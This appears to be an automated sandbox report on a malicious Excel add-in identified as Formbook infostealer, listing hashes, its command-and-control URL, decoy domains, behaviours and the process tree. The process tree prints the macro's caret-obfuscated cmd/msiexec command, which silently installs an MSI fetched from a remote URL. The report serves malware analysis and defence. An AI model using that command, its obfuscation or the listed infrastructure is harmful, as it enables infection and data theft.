Analysis

  • max time kernel
    148s
  • max time network
    139s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    05-05-2021 18:36

General

  • Target

    file2083.xlam

  • Size

    15KB

  • MD5

    399563af4221cc2c176d8f218d6a563d

  • SHA1

    72251218c8127abeab4c04944445c18bdac2688f

  • SHA256

    cc9cefa7960d991d414051f5fe153ffa514a2e687143dd2b1b6966edbbcadbec

  • SHA512

    bb0aef3126bc94f5bc32bddc96b4c6720b4eeeaa91c1a80c95039d4c88871fdc33ceef7cd579bd00d4acbc62987f9e6c0fa7efa08de81e4a4db8194f81f6ebea

Malware Config

Extracted

Family

formbook

Version

4.1

C2

http://www.111bjs.com/ccr/

Decoy

abdullahlodhi.com

jevya.com

knoxvillerestaurant.com

mekarauroko7389.com

cricketspowder.net

johannchirinos.com

orangeorganical.com

libero-tt.com

lorenaegianluca.com

wintab.net

modernmillievintage.com

zgdqcyw.com

jeffabildgaardmd.com

nurulfikrimakassar.com

findyourchef.com

innovationsservicegroup.com

destek-taleplerimiz.com

whfqqco.icu

kosmetikmadeingermany.com

dieteticos.net

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Formbook Payload 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Use of msiexec (install) with remote resource 1 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 6 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 54 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:2180
    • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\file2083.xlam"
      2⤵
      • Checks processor information in registry
      • Enumerates system info in registry
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:424
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C m^SiE^x^e^c /i http://farm-finn.com//admin/56701.msi /qn
        3⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:3720
        • C:\Windows\system32\msiexec.exe
          mSiExec /i http://farm-finn.com//admin/56701.msi /qn
          4⤵
          • Use of msiexec (install) with remote resource
          • Suspicious use of AdjustPrivilegeToken
          PID:2888
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2200
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Windows\Installer\MSI9803.tmp"
        3⤵
          PID:632
    • C:\Windows\system32\msiexec.exe
      C:\Windows\system32\msiexec.exe /V
      1⤵
      • Blocklisted process makes network request
      • Enumerates connected drives
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:576
      • C:\Windows\Installer\MSI9803.tmp
        "C:\Windows\Installer\MSI9803.tmp"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:3156
        • C:\Windows\Installer\MSI9803.tmp
          "C:\Windows\Installer\MSI9803.tmp"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          PID:2324

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    3
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    4
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
      MD5

      4fcb2a3ee025e4a10d21e1b154873fe2

      SHA1

      57658e2fa594b7d0b99d02e041d0f3418e58856b

      SHA256

      90bf6baa6f968a285f88620fbf91e1f5aa3e66e2bad50fd16f37913280ad8228

      SHA512

      4e85d48db8c0ee5c4dd4149ab01d33e4224456c3f3e3b0101544a5ca87a0d74b3ccd8c0509650008e2abed65efd1e140b1e65ae5215ab32de6f6a49c9d3ec3ff

    • C:\Windows\Installer\MSI9803.tmp
      MD5

      c143786765f282d07d418fe98d4fe91a

      SHA1

      d3bbaa15dfe972e30bac4687d4fb1a96185e0bc8

      SHA256

      c26dc231fde9a811c06eb82b7292892eb0db1ff3d45eeec55bc2a74944f39ac6

      SHA512

      14af7f19f4e01949121832585fad1e7fec752cf91083126bf7fddf4ccd5d85aac4ca7bcd7b377b4f1a0a814db5f15f2f7172b4290e0ea1c260950d128a3e13bf

    • C:\Windows\Installer\MSI9803.tmp
      MD5

      c143786765f282d07d418fe98d4fe91a

      SHA1

      d3bbaa15dfe972e30bac4687d4fb1a96185e0bc8

      SHA256

      c26dc231fde9a811c06eb82b7292892eb0db1ff3d45eeec55bc2a74944f39ac6

      SHA512

      14af7f19f4e01949121832585fad1e7fec752cf91083126bf7fddf4ccd5d85aac4ca7bcd7b377b4f1a0a814db5f15f2f7172b4290e0ea1c260950d128a3e13bf

    • C:\Windows\Installer\MSI9803.tmp
      MD5

      c143786765f282d07d418fe98d4fe91a

      SHA1

      d3bbaa15dfe972e30bac4687d4fb1a96185e0bc8

      SHA256

      c26dc231fde9a811c06eb82b7292892eb0db1ff3d45eeec55bc2a74944f39ac6

      SHA512

      14af7f19f4e01949121832585fad1e7fec752cf91083126bf7fddf4ccd5d85aac4ca7bcd7b377b4f1a0a814db5f15f2f7172b4290e0ea1c260950d128a3e13bf

    • \Users\Admin\AppData\Local\Temp\nsj9E3B.tmp\xdqurci0.dll
      MD5

      42b244a4f9d3af1a2788452e5507b0be

      SHA1

      4f59185e37d87cf7d4a0c43bc4f26b092c21e4bf

      SHA256

      14ade88d57789eb08d264b56ff0b46317452e50702285aff672ff12768e45c4f

      SHA512

      df0b5fc0fa680ff5ef849e3c9c312e07e4d741054dba3a9c9a7c05cfc2b99fba09776e864494a579cc34ba985c431d22de9917836cb38d1de05b9aea93fb55fa

    • memory/424-118-0x00007FF861870000-0x00007FF861880000-memory.dmp
      Filesize

      64KB

    • memory/424-122-0x00007FF882220000-0x00007FF88330E000-memory.dmp
      Filesize

      16.9MB

    • memory/424-123-0x000001F1F3770000-0x000001F1F5665000-memory.dmp
      Filesize

      31.0MB

    • memory/424-121-0x00007FF861870000-0x00007FF861880000-memory.dmp
      Filesize

      64KB

    • memory/424-117-0x00007FF861870000-0x00007FF861880000-memory.dmp
      Filesize

      64KB

    • memory/424-116-0x00007FF861870000-0x00007FF861880000-memory.dmp
      Filesize

      64KB

    • memory/424-115-0x00007FF861870000-0x00007FF861880000-memory.dmp
      Filesize

      64KB

    • memory/424-114-0x00007FF7F7520000-0x00007FF7FAAD6000-memory.dmp
      Filesize

      53.7MB

    • memory/632-193-0x0000000000000000-mapping.dmp
    • memory/2180-199-0x0000000005780000-0x0000000005912000-memory.dmp
      Filesize

      1.6MB

    • memory/2180-190-0x0000000005660000-0x0000000005772000-memory.dmp
      Filesize

      1.1MB

    • memory/2200-192-0x0000000000000000-mapping.dmp
    • memory/2200-194-0x0000000000F50000-0x0000000000F62000-memory.dmp
      Filesize

      72KB

    • memory/2200-195-0x0000000000730000-0x000000000075E000-memory.dmp
      Filesize

      184KB

    • memory/2200-196-0x0000000004840000-0x0000000004B60000-memory.dmp
      Filesize

      3.1MB

    • memory/2200-198-0x00000000046A0000-0x0000000004733000-memory.dmp
      Filesize

      588KB

    • memory/2324-189-0x0000000000A50000-0x0000000000D70000-memory.dmp
      Filesize

      3.1MB

    • memory/2324-186-0x000000000041EBB0-mapping.dmp
    • memory/2324-191-0x00000000004E0000-0x000000000058E000-memory.dmp
      Filesize

      696KB

    • memory/2324-188-0x0000000000400000-0x000000000042E000-memory.dmp
      Filesize

      184KB

    • memory/2888-180-0x0000000000000000-mapping.dmp
    • memory/3156-185-0x0000000000BC0000-0x0000000000BC2000-memory.dmp
      Filesize

      8KB

    • memory/3156-181-0x0000000000000000-mapping.dmp
    • memory/3720-179-0x0000000000000000-mapping.dmp